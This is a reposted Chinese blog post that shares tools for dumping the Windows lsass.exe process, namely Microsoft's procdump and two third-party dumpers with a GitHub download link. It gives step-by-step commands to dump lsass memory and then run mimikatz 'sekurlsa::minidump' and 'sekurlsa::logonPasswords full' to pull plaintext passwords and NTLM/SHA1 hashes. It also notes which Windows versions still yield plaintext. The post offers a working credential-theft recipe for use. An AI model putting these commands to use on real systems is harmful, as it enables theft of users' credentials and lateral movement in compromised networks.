当前位置: 首页 > news >正文

分享一个转储lsass.exe进程的工具

dump_lsass_for_Win7_x64.c 和 dump_lsass_for_Win10_x64.c 是国外一位大佬写的专门转储lsass.exe进程的工具

参考链接:https://osandamalith.com/2019/05/11/shellcode-to-dump-the-lsass-process/

procdump.exe 是微软官方的进程转储工具,设计初衷是抓取崩溃进程的内存数据

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

dump_lsass_for_Win7_x64.c 和 dump_lsass_for_Win10_x64.c有编译好的exe程序,GitHub下载:https://github.com/7hmA3s/dump_lsass

 

使用方法

第1步:dump内存数据

#使用prodump.exe转储(需要管理员权限)
procdump.exe -accepteula -ma lsass.exe lsass_dump

#或者使用dump_lsass_for_Win*_x64.exe转储(需要管理员权限)

dump_lsass_for_Win7_x64.exe
dump_lsass_for_Win10_x64.exe

第2步:利用mimikatz读取密码

#lsass_dump.dmp为保存dump数据的文件
mimikatz.exe "sekurlsa::minidump lsass_dump.dmp" "sekurlsa::logonPasswords full" exit

LM、NTLM和SHA1均是加密过的密码,Password是明文密码。

 

注意事项

在某些高版本的Windows中procdump.exe工具虽然能dump内存数据,但用mimikatz无法读取出明文密码,只能获取NTLM哈希和SHA1哈希,如:Windows 10.0.10586 x64

dump_lsass_for_Win7_x64.exe 和 dump_lsass_for_Win10_x64.exe 对Windows系统版本有一些限制,我简单测了一下:

dump_lsass_for_Win7_x64.exe 在以下平台可dump明文密码:

  • Windows 7 x64
  • Windows Server 2008 R2 SP1 x64

dump_lsass_for_Win7_x64.exe 在以下平台只dump出了NTLM哈希:

  • Windows Server 2012 R2 标准版 x64 [6.3.9600]

dump_lsass_for_Win10_x64.exe 在以下平台可dump明文密码:

  • Windows 10.0.10586 x64

dump_lsass_for_Win10_x64.exe 不能在以下平台运行,一运行程序就崩溃:

  • Windows Server 2012 R2 标准版 x64 [6.3.9600]

转载于:https://www.cnblogs.com/dgjnszf/p/11246612.html

相关文章:

  • untiy打android包,报unityStreamingAssets错误
  • 3D LUT Creator 软件+教程
  • Java8 Map的compute()方法
  • 查看进程的端口号,进程id和杀进程
  • 笔记3详情
  • RectTransform的Bounds
  • 爱的十个秘密--4.给予的力量
  • 特效simulation space的设置,导致残留场景
  • unity网络线程和主线程出队列
  • C++网络编程--简单的WinSock代码
  • unity中UI界面的一些动画实现总结
  • Delphi调用CreateProcess创建进程
  • untiy打android包,报Could not resolve com.android.tools.build:gradle和Connect to 127.0.0.1:80 [/127.0.0.1
  • C#访问lua获取一个全局基本数据类型
  • C#访问lua获取一个全局基本数据类型——table映射成C#中class或struct
  • [译] 理解数组在 PHP 内部的实现(给PHP开发者的PHP源码-第四部分)
  • 03Go 类型总结
  • 07.Android之多媒体问题
  • Dubbo 整合 Pinpoint 做分布式服务请求跟踪
  • Java 9 被无情抛弃,Java 8 直接升级到 Java 10!!
  • java架构面试锦集:开源框架+并发+数据结构+大企必备面试题
  • Java深入 - 深入理解Java集合
  • Laravel Mix运行时关于es2015报错解决方案
  • mac修复ab及siege安装
  • Netty+SpringBoot+FastDFS+Html5实现聊天App(六)
  • SegmentFault 社区上线小程序开发频道,助力小程序开发者生态
  • Service Worker
  • UMLCHINA 首席专家潘加宇鼎力推荐
  • VUE es6技巧写法(持续更新中~~~)
  • 从@property说起(二)当我们写下@property (nonatomic, weak) id obj时,我们究竟写了什么...
  • 服务器之间,相同帐号,实现免密钥登录
  • 漫谈开发设计中的一些“原则”及“设计哲学”
  • 使用 Node.js 的 nodemailer 模块发送邮件(支持 QQ、163 等、支持附件)
  • 适配mpvue平台的的微信小程序日历组件mpvue-calendar
  • 想写好前端,先练好内功
  • 移动端唤起键盘时取消position:fixed定位
  • 宾利慕尚创始人典藏版国内首秀,2025年前实现全系车型电动化 | 2019上海车展 ...
  • 继 XDL 之后,阿里妈妈开源大规模分布式图表征学习框架 Euler ...
  • 摩拜创始人胡玮炜也彻底离开了,共享单车行业还有未来吗? ...
  • 直播平台建设千万不要忘记流媒体服务器的存在 ...
  • ​【C语言】长篇详解,字符系列篇3-----strstr,strtok,strerror字符串函数的使用【图文详解​】
  • ​软考-高级-信息系统项目管理师教程 第四版【第23章-组织通用管理-思维导图】​
  • #pragam once 和 #ifndef 预编译头
  • (webRTC、RecordRTC):navigator.mediaDevices undefined
  • (二) Windows 下 Sublime Text 3 安装离线插件 Anaconda
  • (附源码)springboot社区居家养老互助服务管理平台 毕业设计 062027
  • (附源码)ssm经济信息门户网站 毕业设计 141634
  • (附源码)ssm学生管理系统 毕业设计 141543
  • (三十五)大数据实战——Superset可视化平台搭建
  • (深度全面解析)ChatGPT的重大更新给创业者带来了哪些红利机会
  • (一) storm的集群安装与配置
  • (一)RocketMQ初步认识
  • (原創) 如何讓IE7按第二次Ctrl + Tab時,回到原來的索引標籤? (Web) (IE) (OS) (Windows)...
  • (原創) 是否该学PetShop将Model和BLL分开? (.NET) (N-Tier) (PetShop) (OO)
  • .gitignore